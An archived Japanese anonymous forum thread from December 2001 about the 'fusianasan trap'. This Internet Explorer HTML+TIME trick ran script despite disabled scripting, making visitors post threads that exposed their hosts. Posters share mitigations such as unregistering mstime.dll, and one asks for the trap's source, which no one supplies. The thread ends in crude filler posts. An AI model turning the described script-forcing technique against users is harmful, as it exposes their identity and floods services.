訴えることが出来る人の元へ謝罪メルが届いたやら届いてないやら、、、
851 :
心得をよく読みましょう:01/12/18 15:33 ID:nzt0c86+
乱立したスレッドはいつ削除してもらえるんでしょうか。
852 :
:01/12/18 15:47 ID:+VjHobUe
>851
どこの板?
dおう:;
855 :
心得をよく読みましょう:01/12/18 16:16 ID:nzt0c86+
名前入れ忘れました。
たぶん、フシアナサントラップで乱立したスレッドだと思います。
857 :
情報:01/12/18 16:22 ID:PmN3OK5a
>>857 それ俺だ。
いやあ、まじですまんかった。
859 :
心得をよく読みましょう:01/12/18 16:29 ID:fiyKzk3A
>>842 >>846 IP厨房よ、やられてから文句垂れる前に
今度から防衛に気をつけましょーねん★
860 :
心得をよく読みましょう:01/12/18 16:36 ID:suGfXaFV
今はもうフシアナとか被害見ないけど、どんな対処したの?
862 :
心得をよく読みましょう_:01/12/18 18:05 ID:wLonLGTV
対策はどうなってるわけ?
漏れの考えとしては、同じタイトルのスレは立てられないようにすればいいかと思ったが、
そうするとそれに引っかからないようになった亜種が登場するっぽいので却下(w
板スクリプト側で対策するなら投稿時のチェキコード発行だろうね
そうすりゃ1回はSocket通さないと攻撃できないだろうし
面倒臭いけど ( ´Д`)y-~~~
誰かがアクセスするたびにどっかでCGI回して変数抜いて打ち込んで
夜勤さんと耐久力勝負をするならそれはそれで面白い w
864 :
:01/12/18 18:27 ID:+VjHobUe
>855
それは単に馬鹿が糞スレ乱立させただけだべ。
【HTML+TIMEを無効にする方法】
「ファイル名を指定して実行」で
regsvr32 /u mstime.dll
を実行する。
【その他】
「暗号化されていないフォームデータの送信」を「ダイアログを表示」
にしておくとスクリプトが送信するときでも確認のダイアログが出る
のですこしはマシになる。
>>865 任意のスクリプトを実行することができるとは書かれててないけど、
部分的にスクリプトのまねごとができるようになってます。
それを上手く利用すれば任意のスクリプトが実行できるが、
それが仕様なのかバグなのかは未だ不明です。
Microsoftは未だ気づいてないので教えた方がいいかもしれません。
以前はgoogleキャッシュからも投稿可能だったが、
今現在は出来ないんで対策はばっちりなされたってことでいいのかな?
まあ今回の件はひっかかった奴もいるけどわざとのやつもいたってわけで。
>>866 【HTML+TIMEを無効にする方法】
のあと、有効に戻す方法もプリーズ。
永久脱毛と一緒で、元に戻せないとなるとおいそれと試せない。。
>>872 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Default Behaviors
レジストリのここを消せばHTML+TIMEが無効になり、
元に戻せばHTML+TIMEが有効に戻ります。
>>872 regsvr32 mstime.dll
>876
>873 の方法でレジストリいじってみました。(キー削除する前に一応
バックアップ)その後、
>>47 でテストしたら真っ白の画面でした。
当方、Win2000Pro+IE6、かちゅです。
戻す時はバックアップしたレジストリキーを読み込めばOK。
今更なんですが、自分がたてたらしきスレが見あたらなかった。自分がたてたスレ
を見つけられた人っています? 外出だったらスマソ。
半角とかが飽和攻撃に晒されてダウンしかけたのを見つめて不謹慎にもこういう事が
出来るんだなと感心してしまったことは正直済まなかったと思っています。
>>878 自分のリモホが>1の名前欄に出るから簡単に分かったよ?
本来subbbs.cgiで表示されるはずの
「スレッド立てすぎ」「クッキーをオンにしてちょ」が確認できないから
君の場合は立たなかったのかも。
880 :
【速報】:01/12/18 23:53 ID:JEYMo6SN
元サイトの管理者タツタ氏、降臨!
ttp://www2j.biglobe.ne.jp/~tatuta/cgi-bin/gbs/10085206260.htm >>50 名前:タツタ★ 投稿日:2001/12/18(Tue) 22:40
>>すいません。
>>26はパスワード打ち間違えたみたいです。
>>
>>poo掲示板にアップロードという技があるのは、
>>耳にしたことがあるのですが、やり方は知りません。
>>今回問題になった掲示板はすでに使用しなくなって、
>>トップページからはリンクされていなかったのですが、
>>削除せずに残っていたため、検索され利用されてしまったようです。
>>1日1回は巡回しているのですが、
>>使用していない掲示板だったため発見が遅れてしまいました。
>>セキュリティの弱い掲示板を放置していたという点は、
>>私の認識不足であり、ご迷惑おかけ致しました。
>>該当掲示板は削除致しました。
自己レス。
対策が終了して問題がないようなので、「
>>843 」は保留します。
もう大丈夫なの?何もしなくても。
俺も「残念ながら・・・」だったから焦ったんだけど
883 :
心得をよく読みましょう:01/12/19 00:50 ID:HkedL87i
>>784 トロイに感染した方、ファイル名・ウイルス名を教えてくださいー。
884 :
心得をよく読みましょう:01/12/19 00:52 ID:T9OqadSJ
>>883 自分にも感染してたけど、駆除されたから知らん。
886 :
心得をよく読みましょう:01/12/19 00:55 ID:HkedL87i
なんか無茶苦茶怖えー、、
初めてウイルスに感染か?
887 :
名無しさん:01/12/19 01:15 ID:1MExjUMl
既にウィルスに感染してたんでしょ。
トロイなら自覚症状なんて無いし。
私も踏んだので、念のためやってみたけど
出なかったよ。
出た人って、どこの分を踏んだの?
私はこの板のtatuta氏のところの分。たしか14gifだったと・・・。
キャッシュに入ったHTML+TIMEのコードがウィルスチェックに
引っかかっていると思われ
ノートンアンチウィルスでは、
スクリプト内で例えばAxtiveXObjectを呼び出すような、
少し特殊なコードを書いただけで、無関係な安全なものまで、
ウィルスだのトロイだのと判断していまうので、
ひょっとしたらそれが原因かもしれませんね。
Nortonでスキャンしたらloveletter[1].txt.vbsとかいうファイルが見つかった。
かなりビビータよ
893 :
心得をよく読みましょう:01/12/19 02:10 ID:EsiWeMio
スキャンしたけど、ひっかからなかった。
これを期にみなさんNetscapeCommunicatorに乗り換えましょう
895 :
心得をよく読みましょう:01/12/19 05:43 ID:EsiWeMio
>>894 乗り換えてどうするの?
折角IEにはパッチが出ているのにNetscapeはまだパッチを出してくれないんだよ?
896 :
心得をよく読みましょう:01/12/19 05:45 ID:EsiWeMio
そういえば、パッチを当てても無駄だからパッチを当てるな、と
主張していた奴もいたっけ…。そいつもNetscapeを推奨していた。
Netscapeユーザーって確信犯が多いの?
897 :
心得をよく読みましょう:01/12/19 06:14 ID:EsiWeMio
>>895 ネタか?
こんなトラップが作れてしまうようなバカブラウザはIEくらいなもんだよ。
IEは、たとえて言うなら見てくれだけの欠陥住宅みたいなものだ。
Netscapeなら100%大丈夫だとはいえないが、IEよりかは真面目に作られている。
元になっているオープンソース版にはたくさんのプログラマの目が通っているから
恥ずかしい手抜きはできないし、万一深刻な問題があれば抜本的に対策がされる。
898 :
心得をよく読みましょう:01/12/19 06:19 ID:EsiWeMio
およ?なんでIDがいっしょになるの。
内容からしてわかると思うが、895≠897、896≠897だよ。
895=896かどうかは知らん。
>897
根介でもJavaScriptをONにしていたら駄目なんじゃない?
今回のケースでは。
結局の所2ch側で何か対応はされたの?
この串かな?
あ、なるほど、、、よくみりゃそういうことか。
903 :
心得をよく読みましょう:01/12/19 06:35 ID:GpAl+EYz
>>899 結論
ネスケユーザーは確信犯か単なる馬鹿
905 :
ちたん:01/12/19 14:43 ID:Qri7+X6Y
このトラップのソース持ってる人いる?
ちょうだい
906 :
ちたん:01/12/19 14:47 ID:Qri7+X6Y
teniireta
907 :
心得をよく読みましょう:01/12/19 15:00 ID:9NoHHzV8
転送量超過騒ぎの時になってれば面白かったのになぁ
そんなことになったら、ほんとににちゃんあぼ〜んになってたかも(w
俺はお客様だったのか・・・
俺はNNしか使ってない。メーラーもAl-mailのみ。
おかげでウィルス知らず。ついでにAntiVirus入れてる。これ。
ついでにNNはJava関係とCookieは全てオフにしてある、これ最強。
いずれにしてもブラクラチェッカーか何かでソース見ろよー
IE5.01sp2でJavaScriptオンにしといてIEコンポ使うソフト (゚д゚)ウマー
DonutRではJavaScript切るように設定できて (゚д゚)ウマー
Becky2ではHTML表示全部切って (゚д゚)ウマー
913 :
名無しさん:01/12/19 19:55 ID:LnjhWQCl
↓今回の騒ぎでproxy規制の巻き添え食らって2chに書き込めなくなった人
||
∧||∧
( / ⌒ヽ
| | |
∪ / ノ
| ||
∪∪
916 :
心得をよく読みましょう:01/12/19 22:03 ID:NzZAWToj
>915
誤麦か?日本語不自由なのか?
917 :
心得をよく読みましょう:01/12/19 22:11 ID:7NdAZVU+
918 :
コロス ◆cE14kols :01/12/20 14:26 ID:XRJP9TIC
この様子じゃ次スレは煎らんな。
Netscape 6.2.1Jは重過ぎるんで使う気にならん
本家に行けば英語版Navigator4.07単体がまだDLできる
同じバージョンでも英語版のほうが軽かったりする
ネスケ6は、ブックマークが鬼のように使いづらい。
ここはもう、世間に巻かれるまま、IEに乗り換えるべきかと思ったりするけど、
なかなかね…。
922 :
名無しさん:01/12/21 00:23 ID:Qt7XNzL5
お絵描き掲示板にファイルのアップなんてWeb周りのプログラムの知識があれば
簡単なのに、アップされたとこ疑われて迷惑被ったんだね、やれやれ…
おれも実験に2ch系お絵描き掲示板にアスキーアートを画像化してアップしたことある
お絵描き掲示板でわざわざ余計難しいAA描いたと思われたのかな(w
これでお絵描き掲示板にアップソフトなんて言うのも広まったりするのか…
おれは公開する気はない。荒らしになるからな。
あれ作ったやつならアップソフトぐらい簡単だろうね。
お絵描き掲示板のCGIは公開するから、公開してもばれないような認証を考えるのは
公開キー暗号とかそう言うのに詳しくないと、アプレット以外からアップできない
ものは難しいでしょうね。
お簡おおこおあお公も
つか圧縮があったな?
IE の新しい脅威 スクリプトがオフでも強制的に実行させることができる
〜IE に未知のセキュリティホール!?「fusianasanトラップ」より判明〜
巨大掲示板 2ch で蔓延している「fusianasanトラップ」の中に、IE の未知のセキュリティホールが利用されている可能性があることが指摘されている。
セキュリティホールmemo メーリングリストで TAKAGI Hiromitsu 氏から報告された内容によれば、「fusianasanトラップ」の4つの新しいポイントがある。
そのうち、4番目のポイント「セキュリティ設定でアクティブスクリプトを無効に設定していても、強制的にスクリプトを実行させる技」が、これまでに報告
されたことのない未知のセキュリティホールである可能性がある。
本記事は、セキュリティホールmemo およびセキュリティホールmemo を参考にしております。
[memo:2396] Re: fusianasan トラップになんらかの対処を
[TAKAGI, Hiromitsu]
http://memo.st.ryukoku.ac.jp/archive/200112.month/2396.html(Scan)
なあ、画像ファイルにブラクラ埋め込むのって禿げしく既出じゃないのか?
>>931 それ自体は禿らしくガイシュツ。
HTML+TIME でスクリプト無効を無視するのが新技
なにげに大問題だったのか。
2chでの事件はむしろ警告だったのかも。
とりあえずは
>>921で対策してみた。
>>934 なんと、このスレ
>>79の人っすね?
IE5.0-5.5で未解決の方はヤバイな〜
>>934 ぢつは海外ではどこかで既出だったの??
>>936 IE5.0-5.5の方は不明だけど、比較的簡単に気づくことができるから、
MSが自分で発見して、こっそりIE6.0で修正したんだと思う。
IE5.5-6.0の方は検索してもほとんどヒットしないし、
修正されていないので未発見です。
938 :
936:01/12/21 21:17 ID:jqdgdRbm
>>937 という事は、何処かにDEMOコード公開されてた訳ぢゃ無いんだ。。。Thx
少し安心、、、、できないな。丁度年末だし、再現性、、、
あ〜。。
一MSユーザの漏れ、MS01-020公開以来のビクーリ。
939 :
心得をよく読みましょう:01/12/21 21:34 ID:I2Q1GAYk
@ノハ@
( ‘д‘)<やっぱり…
941 :
心得をよく読みましょう:01/12/21 21:38 ID:daLUBgvc
942 :
名無しさ ん:01/12/21 21:42 ID:OYqdjlyc
お祭りじゃん
943 :
かぼ師匠 ◆KABO.XX. :01/12/21 21:43 ID:/B6dvueV
@ノハ@
( ‘д‘)<お祭り会場の削除依頼スレありますか?
>>943 この時間じゃ削除は無理でしょう。警告スレ立てて、アクセス減るまで
放置って所じゃないでしょうか。
#新鯖は対応スクリプト入れてなかったのかなぁ?
@ノハ@
( ‘д‘)<そうですか…
一応、削除スレは立ったみたいですけど
946 :
ぁ:01/12/21 21:49 ID:9gBvKOtt
@ノハ@
( ‘д‘)<リファラ規制はこれの対策じゃないんですか?
これも祭りだから放置?
950 :
心得をよく読みましょう:01/12/21 21:59 ID:WYFgamEg
お祭りchに緊急告知スレ立てました。
@ノハ@
( ‘д‘)<既に30個ほど立ってるんですが、放置ですか?
952 :
心得をよく読みましょう:01/12/21 22:03 ID:DaifAB5d
954 :
心得をよく読みましょう:01/12/21 22:07 ID:CM0Pz+kQ
つか削除するより先にbbs.cgiとsubbbs.cgiの変更を・・・
955 :
心得をよく読みましょう:01/12/21 22:07 ID:gtAY11Yz
956 :
心得をよく読みましょう:01/12/21 22:07 ID:daLUBgvc
957 :
かぼ師匠 ◆KABO.XX. :01/12/21 22:08 ID:/B6dvueV
958 :
かぼ師匠 ◆KABO.XX. :01/12/21 22:08 ID:/B6dvueV
@ノハ@
( ‘д‘)<ひろゆきさ〜ん!夜勤さ〜ん!
[ここ壊れてます] を知らないのかよ…
懲りないねぇ、祭り板が祭られてどないすんやろ?
>>959 @ノハ@
( ‘д‘)<知りません!(きっぱり)
962 :
心得をよく読みましょう:01/12/21 22:14 ID:kGsZEltr
963 :
かぼ師匠 ◆KABO.XX. :01/12/21 22:14 ID:/B6dvueV
@ノハ@
( ‘д‘)<早急にスクリプトの変更を
リファラチェックって負荷かからないの?
965 :
心得をよく読みましょう:01/12/21 22:16 ID:ZGcXj/Qf
どんどん増殖してるね。トラップ作った奴ってある意味神かな
966 :
かぼ師匠 ◆KABO.XX. :01/12/21 22:17 ID:/B6dvueV
@ノハ@
( ‘д‘)<祭りです…
967 :
心得をよく読みましょう:01/12/21 22:17 ID:daLUBgvc
極々一部のプロバイダは未だliveサブドメインのDNSが浸透していないから、
biwa39.he.netからのアクセスに対応するために、
Refererがこれまで規制されなかったのかもしれないわね。
いいかげんそろそろ板のトップに告知して、
biwa39.he.netからのアクセスを切り捨ててもいいと思うけど。
968 :
かぼ師匠 ◆KABO.XX. :01/12/21 22:24 ID:/B6dvueV
@ノハ@
( ‘д‘)<放置…
969 :
かぼ師匠 ◆KABO.XX. :01/12/21 22:29 ID:/B6dvueV
@ノハ@
( ‘д‘)<未だ増殖中です
2geterにはたまらない。
972 :
心得をよく読みましょう:01/12/21 22:33 ID:DaifAB5d
ニュー速+にひろゆきいたみたいだから、カキコしといた。
>>972 祭り厨も呼び込むという諸刃。
まぁ他に手はないけどね。乙。
974 :
かぼ師匠 ◆KABO.XX. :01/12/21 22:38 ID:/B6dvueV
@ノハ@
( ‘д‘)<ひろゆきさん…まだですか?
975 :
心得をよく読みましょう:01/12/21 22:40 ID:kGsZEltr
スクリプトンいじってるのかな
@ノハ@
( ‘д‘)<止まった?
977 :
心得をよく読みましょう:01/12/21 22:44 ID:daLUBgvc
使徒、活動停止しました。
>>947 やっと事態を把握しました...
17, 18 日と旅行逝ってたもので...
クポ…またやってたん?(わら
980 :
新スレ@にわとり pppl166.wbs.ne.jp:01/12/21 23:11 ID:CM0Pz+kQ
981 :
にわとり:01/12/21 23:15 ID:CM0Pz+kQ
あ〜、でも一応立てとこうかね。
よくあることだし…おつかれさま。
983 :
心得をよく読みましょう:01/12/21 23:19 ID:kGsZEltr
2に全文コピペしておいたほうがいいんじゃない?
Javaスクリプトをオフにしているにもかかわらず
スクリプトが実行されるのは、
IE5.5以降標準で装備されている
「HTML+TIME2」の機能によるものらしい。
「HTML+TIME2」の機能をオフにするには
「ファイル名を指定して実行」で
regsvr32 /u mstime.dll
を実行する。
元に戻すには
regsvr32 mstime.dll
を実行する。
上記の
regsvr32 /u mstime.dll
をしたあとは、InternetExplorerのウインドウを全部閉じて、
インターネットエクスプローラーを再起動してからでないと効果がないのではないのかな?
タツタの部屋…
漏れ1年前ほど前常連だったな…
アンチ2ちゃん多かった。その割には2ちゃん語も飛び交ってたが
ラーララーララララーラーララ
アーーーーーーーーアーアアアーアーアアア
ハッベイビハッベイビハッベイビハッテンディン
もうだめぽ
おながいします
オナニーガイストします
チンポゴキブリ
995
(・∀・)インゴー!
もうすこし
Masasi Tasiro
ahya
1000
1001 :
1001:
このスレッドは1000を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。